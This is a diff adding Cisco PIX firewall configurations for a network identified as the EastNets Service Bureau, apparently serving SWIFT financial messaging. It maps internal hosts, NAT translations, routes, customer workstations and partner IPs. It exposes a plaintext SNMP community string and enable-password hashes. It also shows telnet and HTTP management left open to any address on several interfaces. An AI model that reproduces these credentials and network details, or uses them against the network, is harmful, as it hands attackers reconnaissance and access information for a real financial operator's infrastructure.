+pdm location 10.40.6.0 255.255.255.0 clients
+pdm location 10.40.14.201 255.255.255.255 clients
+pdm location 10.41.5.32 255.255.255.255 clients
+pdm location 10.41.6.1 255.255.255.255 clients
+pdm location qfqf-gnat-nw 255.255.255.192 clients
+pdm location 0.0.0.0 255.255.255.255 mgmt
+pdm location ensbdmgmt1 255.255.255.255 mgmt
+pdm location ensbdmgmt2 255.255.255.255 mgmt
+pdm location ensbdmgmt2 255.255.255.255 host
+pdm group smartstream-srv-group smartstream
+pdm logging informational 100
+pdm history enable
+arp timeout 14400
+nat (host) 0 192.168.211.15 255.255.255.255 0 0
+static (dmz,host) 192.168.200.220 192.168.203.220 netmask 255.255.255.255 0 0 
+static (dmz,host) 192.168.200.225 192.168.203.225 netmask 255.255.255.255 0 0 
+static (dmz,host) 192.168.200.235 192.168.203.235 netmask 255.255.255.255 0 0 
+static (dmz,host) 192.168.200.230 192.168.203.230 netmask 255.255.255.255 0 0 
+static (paygate,dmz) 192.168.203.201 pg-arcapita netmask 255.255.255.255 0 0 
+static (paygate,dmz) 192.168.203.203 192.168.201.203 netmask 255.255.255.255 0 0 
+static (paygate,dmz) 192.168.203.205 pg-dgcx netmask 255.255.255.255 0 0 
+static (paygate,dmz) 192.168.203.207 pg-qtel netmask 255.255.255.255 0 0 
+static (paygate,host) 192.168.208.12 192.168.201.112 netmask 255.255.255.255 0 0 
+static (paygate,host) 192.168.200.35 192.168.201.35 netmask 255.255.255.255 0 0 
+static (host,paygate) pg-arcapita 192.168.200.201 netmask 255.255.255.255 0 0 
+static (paygate,clients) 192.168.206.201 pg-arcapita netmask 255.255.255.255 0 0 
+static (paygate,clients) 192.168.206.203 192.168.201.203 netmask 255.255.255.255 0 0 
+static (paygate,clients) 192.168.206.205 pg-dgcx netmask 255.255.255.255 0 0 
+static (paygate,clients) 192.168.206.207 pg-qtel netmask 255.255.255.255 0 0 
+static (paygate,host) 192.168.200.201 pg-arcapita netmask 255.255.255.255 0 0 
+static (paygate,host) 192.168.200.203 192.168.201.203 netmask 255.255.255.255 0 0 
+static (paygate,host) 192.168.200.205 pg-dgcx netmask 255.255.255.255 0 0 
+static (paygate,host) 192.168.200.207 pg-qtel netmask 255.255.255.255 0 0 
+static (dmz,clients) 192.168.206.220 192.168.203.220 netmask 255.255.255.255 0 0 
+static (dmz,clients) 192.168.206.225 192.168.203.225 netmask 255.255.255.255 0 0 
+static (dmz,clients) 192.168.206.230 192.168.203.230 netmask 255.255.255.255 0 0 
+static (dmz,clients) 192.168.206.235 192.168.203.235 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.35 192.168.200.35 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.59 192.168.200.59 netmask 255.255.255.255 0 0 
+static (host,paygate) 192.168.201.71 192.168.200.71 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.33 192.168.200.33 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.34 192.168.200.34 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.71 192.168.200.71 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.20 192.168.200.20 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.22 192.168.200.22 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.25 192.168.200.25 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.72 192.168.200.72 netmask 255.255.255.255 0 0 
+static (host,paygate) 192.168.201.72 192.168.200.72 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.95 192.168.200.95 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.96 192.168.200.96 netmask 255.255.255.255 0 0 
+static (paygate,host) 192.168.200.10 192.168.201.110 netmask 255.255.255.255 0 0 
+static (paygate,host) 192.168.200.11 192.168.201.111 netmask 255.255.255.255 0 0 
+static (host,paygate) 192.168.201.111 192.168.200.11 netmask 255.255.255.255 0 0 
+static (host,paygate) 192.168.201.110 192.168.200.10 netmask 255.255.255.255 0 0 
+static (dmz,host) 192.168.203.111 192.168.200.11 netmask 255.255.255.255 0 0 
+static (dmz,host) 192.168.200.10 192.168.203.110 netmask 255.255.255.255 0 0 
+static (dmz,host) 192.168.200.11 192.168.203.111 netmask 255.255.255.255 0 0 
+static (dmz,host) 192.168.200.13 192.168.203.113 netmask 255.255.255.255 0 0 
+static (dmz,host) 192.168.200.14 192.168.203.114 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.110 192.168.200.10 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.111 192.168.200.11 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.53 192.168.200.51 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.51 192.168.200.52 netmask 255.255.255.255 0 0 
+static (smartstream,clients) 192.168.206.208 endssapp1 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.53 192.168.200.51 netmask 255.255.255.255 0 0 
+static (dmz,smartstream) 192.168.218.230 192.168.203.230 netmask 255.255.255.255 0 0 
+static (smartstream,clients) 192.168.206.209 endssdb1 netmask 255.255.255.255 0 0 
+static (smartstream,host) 192.168.200.209 endssdb1 netmask 255.255.255.255 0 0 
+static (smartstream,host) 192.168.200.208 endssapp1 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.110 192.168.200.10 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.165 ensbdnbcr1 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.166 ensbdnbcr2 netmask 255.255.255.255 0 0 
+static (host,paygate) 192.168.201.104 sl3 netmask 255.255.255.255 0 0 
+static (host,dmz) 192.168.203.245 ftp netmask 255.255.255.255 0 0 
+static (host,smartstream) endssapp1 192.168.200.208 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.32 192.168.200.32 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.25 192.168.200.25 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.4 192.168.200.4 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.15 192.168.200.15 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.17 192.168.200.17 netmask 255.255.255.255 0 0 
+static (dmz,clients) 192.168.206.215 ensbdtasw1 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.51 192.168.200.52 netmask 255.255.255.255 0 0 
+static (mgmt,smartstream) 192.168.218.10 ensbdmgmt1 netmask 255.255.255.255 0 0 
+static (mgmt,smartstream) 192.168.218.11 ensbdmgmt2 netmask 255.255.255.255 0 0 
+static (host,smartstream) 192.168.218.111 192.168.200.11 netmask 255.255.255.255 0 0 
+access-group clients_access_in in interface clients
+access-group paygate_access_in in interface paygate
+access-group host_access_in in interface host
+access-group dmz_access_in in interface dmz
+access-group smartstream_access_in in interface smartstream
+access-group mgmt_access_in in interface mgmt
+route clients 0.0.0.0 0.0.0.0 192.168.206.4 1
+route clients 0.0.0.0 0.0.0.0 192.168.206.5 15
+route clients 10.14.0.0 255.255.255.0 192.168.206.5 2
+route clients 10.15.0.0 255.255.255.0 192.168.206.5 2
+route clients 10.31.5.130 255.255.255.255 192.168.206.5 2
+route clients 10.33.10.202 255.255.255.255 192.168.206.5 2
+route clients 10.33.14.0 255.255.255.0 192.168.206.5 2
+route clients 10.40.5.32 255.255.255.255 192.168.206.5 2
+route clients 10.40.5.63 255.255.255.255 192.168.206.5 2
+route clients 10.40.6.0 255.255.255.0 192.168.206.5 2
+route clients 10.40.14.201 255.255.255.255 192.168.206.5 2
+route clients 10.41.5.32 255.255.255.255 192.168.206.5 2
+route clients 10.41.6.1 255.255.255.255 192.168.206.5 2
+route clients 10.71.120.0 255.255.255.0 192.168.206.27 1
+route clients 10.72.110.0 255.255.255.0 192.168.206.6 1
+route clients 10.72.110.0 255.255.255.0 192.168.206.27 10
+route clients 10.149.0.0 255.255.0.0 192.168.206.7 2
+route clients 10.153.0.64 255.255.255.192 192.168.206.4 1
+route clients 10.153.2.0 255.255.255.192 192.168.206.4 1
+route clients 10.154.0.0 255.255.0.0 192.168.206.4 2
+route clients 10.154.9.128 255.255.255.192 192.168.206.4 1
+route host 172.28.0.0 255.255.0.0 192.168.200.1 2
+route clients 192.168.106.0 255.255.254.0 192.168.206.4 2
+route host 192.168.209.0 255.255.255.0 192.168.200.1 2
+route host 192.168.211.0 255.255.255.0 192.168.200.1 2
+route host 192.168.211.15 255.255.255.255 192.168.200.1 1
+route host 192.168.219.0 255.255.255.0 192.168.200.1 1
+timeout xlate 3:00:00
+timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 rpc 0:10:00 h225 1:00:00
+timeout h323 0:05:00 mgcp 0:05:00 sip 0:30:00 sip_media 0:02:00
+timeout sip-disconnect 0:02:00 sip-invite 0:03:00
+timeout uauth 0:05:00 absolute
+aaa-server TACACS+ protocol tacacs+ 
+aaa-server TACACS+ max-failed-attempts 3 
+aaa-server TACACS+ deadtime 10 
+aaa-server RADIUS protocol radius 
+aaa-server RADIUS max-failed-attempts 3 
+aaa-server RADIUS deadtime 10 
+aaa-server LOCAL protocol local 
+http server enable
+http 0.0.0.0 0.0.0.0 clients
+http 192.168.201.110 255.255.255.255 paygate
+http 0.0.0.0 0.0.0.0 paygate
+http 0.0.0.0 0.0.0.0 host
+http 0.0.0.0 0.0.0.0 dmz
+http 192.168.208.0 255.255.255.0 mgmt
+snmp-server host mgmt ensbdmgmt2
+no snmp-server location
+no snmp-server contact
+snmp-server community ^enSBSXstr1ng^
+snmp-server enable traps
+tftp-server mgmt ensbdmgmt1 /
+floodguard enable
+telnet 192.168.202.249 255.255.255.255 clients
+telnet 0.0.0.0 0.0.0.0 paygate
+telnet 192.168.202.249 255.255.255.255 paygate
+telnet 0.0.0.0 0.0.0.0 host
+telnet 192.168.202.249 255.255.255.255 host
+telnet 192.168.202.249 255.255.255.255 dmz
+telnet 0.0.0.0 0.0.0.0 mgmt
+telnet timeout 5
+ssh timeout 5
+console timeout 0
+terminal width 80
+banner login EastNets Service Bureau
+banner login NOTICE TO USERS
+banner login This computer is a property of EastNets (R). Any or all use of this system is governed by the Security Policies of EastNets Service Bureau (ENSB).
+banner login Any or all uses of this system, and all files on this system may be monitored, recorded, audited, or inspected  at the discretion of EastNets Management.
+banner login Unauthorized or improper use of this system may result in administrative disciplinary action and civil and criminal penalties. By continuing to use this system you indicate your awareness of and consent to these terms and conditions of use. LOG OFF IMMEDIATELY if you do not agree to the conditions stated in this warning.
+banner login Please contact ENSB Infrastructure Team to obtain a copy of the Security Policy or visit ENSB portal at http://entranet.eastnets.com/sites/ENSB/.
+Cryptochecksum:81a3d0a8ba7c3afa7d90a8b63f00e307
+: end

swift/00554_0_ensbdpix4-09aug2013

@@ -0,0 +1,933 @@
+: Saved
+: Written by enable_15 at 20:02:19.445 UTC Sun Aug 11 2013
+!
+PIX Version 8.0(2) 
+!
+hostname ENSBUSPIX
+domain-name sag
+enable password Ro5XpDeSuehPBEdi encrypted
+names
+name 192.168.202.20 sag-srv2
+name 192.168.211.17 vpn1-2-nsrp
+name 192.168.211.16 vpn2-int
+name 192.168.211.15 vpn1-int
+name 172.28.0.70 FEBKUS6L-LA-ws2
+name 172.28.0.71 FEBKUS6L-LA-ws3
+name 172.28.0.72 FEBKUS6L-LA-ws4
+name 172.28.0.73 FEBKUS6L-LA-ws5
+name 172.28.0.74 FEBKUS6L-LA-ws6
+name 172.28.0.199 FEBKUS6L-IR-ws3
+name 172.28.0.200 FEBKUS6L-IR-ws4
+name 172.28.0.201 FEBKUS6L-IR-ws5
+name 172.28.0.202 FEBKUS6L-IR-ws6
+name 172.28.0.203 FEBKUS6L-IR-ws7
+name 10.100.200.0 ensb-mgmt-nw
+name 192.168.211.0 ensb-dxb-nw
+name 192.168.211.50 host-srv1
+name 192.168.211.51 host-srv2
+name 192.168.211.52 host-srv3
+name 172.28.0.197 FEBKUS6L-IR-ws1
+name 172.28.0.198 FEBKUS6L-IR-ws2
+name 172.28.0.69 FEBKUS6L-LA-ws1
+name 172.28.0.75 FEBKUS6L-LA-ws7
+name 192.168.111.0 ensb-us-nw description US Network
+name 192.168.213.201 unirisx-srv1
+name 10.100.205.0 unirisx-mgmt-nw
+name 192.168.213.202 unirisx-srv2
+name 192.168.213.203 unirisx-srv3
+name 172.28.1.68 IDXDUS33-ws1
+name 172.28.1.69 IDXDUS33-ws2
+name 172.28.1.70 IDXDUS33-ws3
+name 10.100.210.0 unirisx-pharos-nw description Unirisx-Pharos Dial-in IP Pool
+name 192.168.209.52 ensbusl3
+name 192.168.209.50 ensbusl1
+name 192.168.209.51 ensbusl2
+name 192.168.208.0 ensb-dxb-mgmt-nw
+name 172.28.1.133 RBBCUS6L-ws1
+name 172.28.1.134 RBBCUS6L-ws2
+name 192.168.214.100 finmex-srv1 description Finmex Portal Server1
+name 10.100.215.0 finmex-mgmt-nw description finmex-mgmt-pool
+name 172.28.1.193 GPSXUS55-loopback
+name 172.28.1.194 GPSXUS55-mgmt1
+name 172.28.1.195 GPSXUS55-mgmt2
+name 172.28.1.196 GPSXUS55-nsrp
+name 172.28.1.198 GPSXUS55-ws1
+name 172.28.1.199 GPSXUS55-ws2
+name 172.28.1.200 GPSXUS55-ws3
+name 172.28.1.201 GPSXUS55-ws4
+name 172.28.1.202 GPSXUS55-ws5
+name 172.28.1.135 RBBCUS6L-ws3
+name 172.28.1.136 RBBCUS6L-ws4
+name 172.28.2.129 CAGPBMHM-LB
+name 192.168.209.31 CAGP-SRV1
+name 192.168.209.32 CAGP-SRV2
+name 192.168.226.0 ensb-jo-nw
+name 172.28.2.130 CAGPBMHM-MGMT-VPN1-OLD
+name 172.28.2.132 CAGPBMHM-NSRP-OLD
+name 10.149.10.0 nw-sslvpn-nw description ENSBNW SSLVPN IP
+name 192.168.202.25 sagfin1
+name 192.168.202.26 sagfin2
+name 192.168.202.22 sagsns1
+name 192.168.202.23 sagsns2
+name 192.168.202.21 sagtest1
+name 206.201.131.9 UNIRISX-KEYSRV
+name 192.168.214.105 enMORE-srvr1
+name 4.3.2.0 Vitname-NW
+name 192.168.202.245 enFTP1
+name 193.43.238.250 BICs-HomeSend-Test
+name 193.43.238.249 BICs-HomeSend-Prod
+name 192.168.214.51 SL1
+name 192.168.202.30 swp-nlb
+name 192.168.202.28 swp-srv1
+name 192.168.202.29 swp-srv2
+name 192.168.214.106 enMORE-srvr2
+name 10.100.220.0 cs-support-nw
+name 192.168.214.107 enMORE-srvr3
+name 192.168.214.108 enMORE-srvr4
+name 192.168.211.230 en.MoreWebSRVR1 description en.More Web Server 1
+name 84.45.85.251 RemitONE-Srvr1 description RemitONE Public IP 1
+name 84.45.85.253 RemitONE-Srvr2 description RemitONE Public IP 2
+name 84.45.85.222 RemitONE-Test_Srvr1 description RemitONE Public IP 3
+name 84.45.85.199 RemitONE-Srvr3
+name 84.45.85.195 RemitONE-Srvr4
+name 192.168.202.101 ensbdrsa2
+dns-guard
+!
+interface Ethernet0
+ nameif clients
+ security-level 10
+ ip address 192.168.211.1 255.255.255.0 
+!
+interface Ethernet1
+ nameif host
+ security-level 70
+ ip address 192.168.209.1 255.255.255.0 
+!
+interface Ethernet2
+ nameif sag
+ security-level 80
+ ip address 192.168.202.4 255.255.255.0 
+!
+interface Ethernet3
+ description unirisx zone
+ nameif unirisx
+ security-level 30
+ ip address 192.168.213.1 255.255.255.0 
+!
+interface Ethernet4
+ description mgmt zone
+ nameif mgmt
+ security-level 50
+ ip address 192.168.208.4 255.255.255.0 
+!
+interface Ethernet5
+ no nameif
+ no security-level
+ no ip address
+!
+interface Ethernet5.1
+ description Finemx Portal Interface
+ vlan 214
+ nameif finmex
+ security-level 20
+ ip address 192.168.214.1 255.255.255.0 
+!
+passwd Ro5XpDeSuehPBEdi encrypted
+banner login EastNets Service Bureau
+banner login NOTICE TO USERS
+banner login This computer is a property of EastNets (R). Any or all use of this system is governed by the Security Policies of EastNets Service Bureau (ENSB).
+banner login Any or all uses of this system, and all files on this system may be monitored, recorded, audited, or inspected  at the discretion of EastNets Management.
+banner login Unauthorized or improper use of this system may result in administrative disciplinary action and civil and criminal penalties. By continuing to use this system you indicate your awareness of and consent to these terms and conditions of use. LOG OFF IMMEDIATELY if you do not agree to the conditions stated in this warning.
+banner login Please contact ENSB Infrastructure Team to obtain a copy of the Security Policy or visit ENSB portal at http://entranet.eastnets.com/sites/ENSB/.
+ftp mode passive
+dns domain-lookup clients
+dns domain-lookup host
+dns domain-lookup sag
+dns domain-lookup unirisx
+dns domain-lookup mgmt
+dns domain-lookup finmex
+dns server-group DefaultDNS
+ domain-name sag
+object-group network sag-servers-prod
+ network-object host sagsns1
+ network-object host sagfin2
+object-group network ensb-vpns-group
+ network-object vpn1-int 255.255.255.255
+ network-object vpn2-int 255.255.255.255
+ network-object vpn1-2-nsrp 255.255.255.255
+object-group service msih-ports-udp udp
+ port-object range 9000 9059
+ port-object range 48200 48200
+ port-object range 48100 48105
+ port-object range 135 135
+ port-object range 48002 48009
+ port-object range 6500 6501
+ port-object range 1029 1029
+object-group service msih-ports-udp-casmf udp
+ port-object range 5101 5105
+ port-object range 5206 5207
+object-group service swift-dns-port udp
+ port-object range domain domain
+object-group service symantec-av udp
+ port-object range 38293 38293
+ port-object range 2967 2967
+object-group service FMSIH-OUT-TCP tcp
+ port-object range 9100 9106
+ port-object range 6500 6501
+object-group service FMSIH-OUT-TCP-CASMF tcp
+ group-object FMSIH-OUT-TCP
+ port-object range 5206 5207
+ port-object range 5101 5105
+object-group service FMSIH-PRINT-TCP tcp
+ port-object range 9100 9106
+object-group service msih-ports-tcp tcp
+ port-object range 9000 9059
+ port-object range 48200 48200
+ port-object range 48100 48105
+ port-object range 135 135
+ port-object range 48009 48009
+ port-object range 6500 6501
+ port-object range 1029 1029
+ port-object eq ssh
+object-group service msih-ports-tcp-casmf tcp
+ group-object msih-ports-tcp
+ port-object range 5206 5207
+ port-object range 5101 5105
+object-group service snmp tcp-udp
+ port-object range 161 162
+object-group service doubletake tcp-udp
+ port-object range 1105 1106
+ port-object range 1100 1100
+object-group service msih-ports tcp-udp
+ port-object range 48200 48200
+ port-object range 48100 48105
+ port-object range 135 135
+ port-object range 48009 48009
+ port-object range 6500 6501
+ port-object range 9000 9049
+ port-object range 1029 1029
+object-group service shared-ports tcp
+ port-object range 445 445
+ port-object range netbios-ssn netbios-ssn
+ port-object range 137 137
+ port-object eq 138
+object-group service swift-49168-9 tcp
+ port-object range 49168 49169
+object-group service swift-cara-port tcp
+ port-object range 709 709
+object-group service swift-dialup-port tcp
+ port-object eq www
+object-group service swift-direcotry-ports tcp
+ port-object range 1400 1409
+ port-object range 1600 1609
+ port-object range 1100 1109
+ port-object range ldap ldap
+ port-object range 1300 1309
+ port-object range 1500 1509
+ port-object range 1200 1209
+object-group service swift-myswift-webserver-port tcp
+ port-object range https https
+object-group service swift-rvs-port tcp
+ port-object range 49170 49170
+object-group service swift-secrets-webserver-port tcp
+ port-object range 49172 49172
+object-group service swift-switch-ports tcp
+ port-object range 50153 50190
+ port-object range 52100 52399
+ port-object range 49500 49510
+ port-object range 50200 50806
+object-group service swift-web-connector-ports tcp
+ port-object eq www
+ port-object range 49171 49171
+object-group service vnc-port tcp
+ port-object range 5800 5800
+ port-object range 5900 5900
+object-group network sag-srv-test
+ network-object sagsns1 255.255.255.255
+object-group network sag-servers-prod_ref
+ network-object 192.168.246.20 255.255.255.255
+ network-object 192.168.246.25 255.255.255.255
+ network-object 192.168.209.25 255.255.255.255
+ network-object 192.168.209.20 255.255.255.255
+object-group network ensb-dxb-nw
+ network-object ensb-dxb-nw 255.255.255.0
+object-group service web-ports tcp
+ port-object eq www
+ port-object eq https
+object-group network sag-servers-prod1
+ network-object sag-srv2 255.255.255.255
+ network-object sagfin1 255.255.255.255
+object-group network sag-servers-prod_ref_1
+ network-object 192.168.211.25 255.255.255.255
+ network-object 192.168.211.20 255.255.255.255
+object-group network FEBKUS6L-ws-nw
+ network-object FEBKUS6L-LA-ws2 255.255.255.255
+ network-object FEBKUS6L-LA-ws3 255.255.255.255
+ network-object FEBKUS6L-LA-ws4 255.255.255.255
+ network-object FEBKUS6L-LA-ws5 255.255.255.255
+ network-object FEBKUS6L-LA-ws6 255.255.255.255
+ network-object FEBKUS6L-LA-ws7 255.255.255.255
+ network-object FEBKUS6L-IR-ws2 255.255.255.255
+ network-object FEBKUS6L-IR-ws3 255.255.255.255
+ network-object FEBKUS6L-IR-ws4 255.255.255.255
+ network-object FEBKUS6L-IR-ws5 255.255.255.255
+ network-object FEBKUS6L-IR-ws6 255.255.255.255
+ network-object FEBKUS6L-IR-ws7 255.255.255.255
+ network-object FEBKUS6L-LA-ws1 255.255.255.255
+ network-object host FEBKUS6L-IR-ws1
+object-group network sharedsaa-saa-group
+ network-object host host-srv1
+ network-object host host-srv2
+ network-object host host-srv3
+object-group network ensb-mgmt-nw
+ network-object ensb-mgmt-nw 255.255.255.0
+ network-object ensb-dxb-nw 255.255.255.0
+ network-object ensb-dxb-mgmt-nw 255.255.255.0
+object-group protocol TCPUDP
+ protocol-object udp
+ protocol-object tcp
+object-group protocol DM_INLINE_PROTOCOL_2
+ protocol-object udp
+ protocol-object tcp
+object-group network ensb-us-nw
+ network-object ensb-us-nw 255.255.255.0
+object-group network unirisx-srv-group
+ network-object host 192.168.211.201
+ network-object host 192.168.211.202
+ network-object host 192.168.211.203
+object-group network unirisx-mgmt-group
+ network-object unirisx-mgmt-nw 255.255.255.0
+object-group service RDP tcp
+ port-object eq 3389
+object-group network IDXDUS33-nw
+ network-object host IDXDUS33-ws1
+ network-object host IDXDUS33-ws2
+ network-object host IDXDUS33-ws3
+object-group network unirisx-pharos-group
+ network-object unirisx-pharos-nw 255.255.255.0
+object-group network DM_INLINE_NETWORK_1
+ network-object host ensbusl1
+ network-object host ensbusl2
+ network-object host ensbusl3
+ network-object host CAGP-SRV1
+ network-object host CAGP-SRV2
+object-group network DM_INLINE_NETWORK_2
+ network-object host ensbusl1
+ network-object host ensbusl2
+ network-object host ensbusl3
+ network-object host CAGP-SRV1
+ network-object host CAGP-SRV2
+object-group network DM_INLINE_NETWORK_3
+ network-object host unirisx-srv1
+ network-object host unirisx-srv2
+ network-object host unirisx-srv3
+object-group network DM_INLINE_NETWORK_4
+ network-object host unirisx-srv1
+ network-object host unirisx-srv2
+ network-object host unirisx-srv3
+object-group network RBBCUS6L-ws-nw
+ network-object host RBBCUS6L-ws1
+ network-object host RBBCUS6L-ws2
+ network-object host RBBCUS6L-ws3
+ network-object host RBBCUS6L-ws4
+object-group network finmex-mgmt-group
+ network-object finmex-mgmt-nw 255.255.255.0
+object-group service DM_INLINE_SERVICE_1
+ service-object icmp 
+ service-object tcp eq smtp 
+object-group network GPSXUS55-nw
+ network-object host GPSXUS55-loopback
+ network-object host GPSXUS55-mgmt1
+ network-object host GPSXUS55-mgmt2
+ network-object host GPSXUS55-nsrp
+ network-object host GPSXUS55-ws1
+ network-object host GPSXUS55-ws2
+ network-object host GPSXUS55-ws3
+ network-object host GPSXUS55-ws4
+ network-object host GPSXUS55-ws5
+object-group network CAGPBMHM-nw
+ network-object host CAGPBMHM-NSRP-OLD
+ network-object host 172.28.2.133
+ network-object host 172.28.2.134
+ network-object host 172.28.2.135
+ network-object host 172.28.2.136
+ network-object host 172.28.2.137
+ network-object host 172.28.2.138
+ network-object host 172.28.2.139
+ network-object host 172.28.2.140
+ network-object host 172.28.2.141
+ network-object host 172.28.2.142
+ network-object host 172.28.2.143
+ network-object host 172.28.2.144
+ network-object host 172.28.2.145
+ network-object host CAGPBMHM-LB
+ network-object host CAGPBMHM-MGMT-VPN1-OLD
+ network-object host 172.28.2.146
+ network-object host 172.28.2.147
+ network-object host 172.28.2.148
+ network-object host 172.28.2.149
+ network-object host 172.28.2.150
+ network-object host 172.28.2.151
+ network-object host 172.28.2.152
+ network-object host 172.28.2.153
+ network-object host 172.28.2.154
+ network-object host 172.28.2.157
+ network-object host 172.28.2.158
+ network-object host 172.28.2.159
+ network-object host 172.28.2.160
+ network-object host 172.28.2.161
+ network-object host 172.28.2.162
+ network-object host 172.28.2.163
+ network-object host 172.28.2.164
+ network-object host 172.28.2.165
+ network-object host 172.28.2.166
+ network-object host 172.28.2.167
+ network-object host 172.28.2.168
+ network-object host 172.28.2.169
+ network-object host 172.28.2.170
+ network-object host 172.28.2.171
+ network-object host 172.28.2.173
+ network-object host 172.28.2.174
+ network-object host 172.28.2.172
+ network-object host 172.28.2.175
+ network-object host 172.28.2.176
+ network-object host 172.28.2.177
+object-group network CAGP-SRV-GROUP
+ network-object host CAGP-SRV1
+ network-object host CAGP-SRV2
+object-group service sidestation tcp
+ port-object eq 8401
+object-group service sql tcp
+ port-object eq 1433
+object-group service DM_INLINE_TCP_1 tcp
+ group-object msih-ports
+ port-object eq ftp
+ port-object eq ssh
+ group-object sidestation
+ group-object sql
+object-group network CAPG-SRV-GROUP-NAT
+ network-object host 192.168.211.31
+ network-object host 192.168.211.32
+object-group service Unirisx-Keysrv tcp
+ description keyserver.hostidp.com on TCP port 18021
+ port-object eq 18201
+object-group network DM_INLINE_NETWORK_5
+ group-object sag-servers-prod
+ group-object sag-servers-prod1
+object-group network en.More-srvr
+ network-object host enMORE-srvr1
+ network-object host enMORE-srvr2
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group network en.More-srvr_ref
+ network-object host 192.168.211.105
+ network-object host 192.168.211.106
+ network-object host 192.168.211.107
+ network-object host 192.168.211.108
+ network-object host enMORE-srvr4
+ network-object host enMORE-srvr3
+object-group network CAGPBMHM-NW-DR
+ network-object 172.28.2.192 255.255.255.192
+object-group service DM_INLINE_TCP_3 tcp
+ group-object msih-ports
+ group-object sidestation
+ group-object sql
+ port-object eq ftp
+ port-object eq ssh
+object-group network en.More_Customers
+ network-object Vitname-NW 255.255.255.0
+object-group service DM_INLINE_TCP_2 tcp
+ port-object eq 4443
+ port-object eq 7777
+ port-object eq 8080
+ port-object eq 8081
+ port-object eq www
+ port-object eq https
+ port-object eq ftp
+ port-object eq ftp-data
+object-group service DM_INLINE_TCP_4 tcp
+ port-object eq 4443
+ port-object eq 7777
+ port-object eq 8080
+ port-object eq 8081
+ port-object eq www
+ port-object eq https
+ port-object eq ftp
+ port-object eq ftp-data
+object-group service DM_INLINE_TCP_5 tcp
+ port-object eq ftp
+ port-object eq ftp-data
+ port-object eq ssh
+object-group service shared-ports-udp udp
+ port-object eq 139
+ port-object eq 445
+ port-object eq netbios-dgm
+ port-object eq netbios-ns
+object-group service DM_INLINE_TCP_7 tcp
+ port-object eq ftp
+ port-object eq ftp-data
+ port-object eq ssh
+object-group network ftp-srv_ref-clients
+ network-object host 192.168.211.115
+object-group network ftp-srv_ref-finmex
+ network-object host 192.168.214.245
+object-group network DM_INLINE_NETWORK_6
+ network-object host BICs-HomeSend-Prod
+ network-object host BICs-HomeSend-Test
+object-group network DM_INLINE_NETWORK_7
+ network-object host BICs-HomeSend-Prod
+ network-object host BICs-HomeSend-Test
+object-group service DM_INLINE_TCP_6 tcp
+ port-object eq ftp
+ port-object eq ftp-data
+ port-object eq ssh
+object-group service DM_INLINE_SERVICE_2
+ service-object tcp eq www 
+ service-object tcp eq https 
+ service-object tcp-udp eq domain 
+object-group service DM_INLINE_TCP_8 tcp
+ port-object eq 3389
+ port-object eq www
+ port-object eq https
+object-group service DM_INLINE_TCP_9 tcp
+ port-object eq www
+ port-object eq https
+object-group service DM_INLINE_TCP_10 tcp
+ port-object eq ftp
+ port-object eq ftp-data
+object-group network swp-srvrs
+ network-object host swp-srv1
+ network-object host swp-srv2
+ network-object host swp-nlb
+object-group service DM_INLINE_SERVICE_3
+ service-object icmp 
+ service-object tcp eq 48600 
+ service-object tcp eq https 
+object-group network DM_INLINE_NETWORK_8
+ network-object host 192.168.211.105
+ network-object host 192.168.211.106
+ network-object host enMORE-srvr4
+ network-object host enMORE-srvr3
+object-group network DM_INLINE_NETWORK_9
+ network-object host 192.168.211.105
+ network-object host 192.168.211.106
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group network DM_INLINE_NETWORK_10
+ network-object host 192.168.211.105
+ network-object host 192.168.211.106
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group network DM_INLINE_NETWORK_11
+ network-object host 192.168.211.105
+ network-object host 192.168.211.106
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group service DM_INLINE_TCP_11 tcp
+ port-object eq 3389
+ port-object eq www
+ port-object eq https
+object-group service mgmt-bkup-tcp tcp
+ port-object eq 445
+ port-object range 137 netbios-ssn
+ port-object eq 2967
+ port-object range 10000 10025
+ port-object range 10250 10275
+object-group service mgmt-bkup-udp udp
+ port-object eq 445
+ port-object range netbios-ns 139
+ port-object eq 2967
+ port-object eq 38293
+object-group network DM_INLINE_NETWORK_12
+ network-object host enMORE-srvr1
+ network-object host enMORE-srvr2
+ network-object host enMORE-srvr3
+ network-object host enMORE-srvr4
+object-group network DM_INLINE_NETWORK_13
+ network-object host enMORE-srvr1
+ network-object host enMORE-srvr3
+object-group network DM_INLINE_NETWORK_14
+ network-object host enMORE-srvr2
+ network-object host enMORE-srvr4
+object-group network DM_INLINE_NETWORK_15
+ network-object host enMORE-srvr1
+ network-object host enMORE-srvr3
+object-group network DM_INLINE_NETWORK_16
+ network-object host enMORE-srvr2
+ network-object host enMORE-srvr4
+object-group network DM_INLINE_NETWORK_17
+ network-object host enMORE-srvr1
+ network-object host enMORE-srvr3
+object-group network DM_INLINE_NETWORK_18
+ network-object host enMORE-srvr2
+ network-object host enMORE-srvr4
